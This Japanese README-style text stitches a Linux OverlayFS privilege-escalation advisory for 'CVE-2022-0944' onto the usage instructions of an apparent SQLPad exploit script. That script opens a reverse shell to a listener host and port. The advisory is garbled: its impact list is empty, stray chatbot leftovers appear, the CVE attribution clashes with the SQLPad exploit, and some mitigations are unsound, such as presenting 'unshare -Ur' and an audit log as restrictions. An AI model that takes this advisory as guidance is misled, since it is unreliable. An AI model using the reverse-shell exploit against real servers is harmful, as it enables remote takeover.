OverlayFSにおけるLinuxカーネルの権限昇格脆弱性に関するセキュリティアドバイザリと緩和ガイド。
CVE-2022-0944 は、LinuxカーネルのOverlayFSサブシステムにおけるセキュリティ脆弱性であり、特定の設定でのファイル作成の不適切な処理を通じてローカル攻撃者が権限を昇格させることを可能にします。

🚨 影響
ローカル攻撃者は以下が可能となります。
🔍 検出
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ 緩和策
公式パッチ
以下の修正バージョンのいずれかに更新してください。
更新コマンド:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
回避策(パッチ適用が直ちにできない場合)
OverlayFSの使用を制限する: sudo modprobe -r overlay
名前空間の制限を実装する:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmorポリシーを適用する: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ 免責事項 このドキュメントは情報提供のみを目的として提供されています。正確性を確保するための努力がなされていますが、保証はありません。必ず開発環境でパッチをテストしてから本番環境に適用してください。
最終更新日: 2023-10-01 | 変更ログを見る
主な機能:
このREADME形式は以下に適しています:
以下の操作はいかがでしょうか:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
例:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
このリポジトリに含まれるコードとツールは、教育目的、特にサイバーセキュリティコースや学習環境での使用のみを目的としています。このコードの作成者は、このコードの使用、誤用、または変更から生じるいかなる結果に対しても責任を負いません。このコードは「現状のまま」提供され、明示または黙示を問わず、商品性や特定目的への適合性の黙示の保証を含むがこれに限定されない、いかなる保証もありません。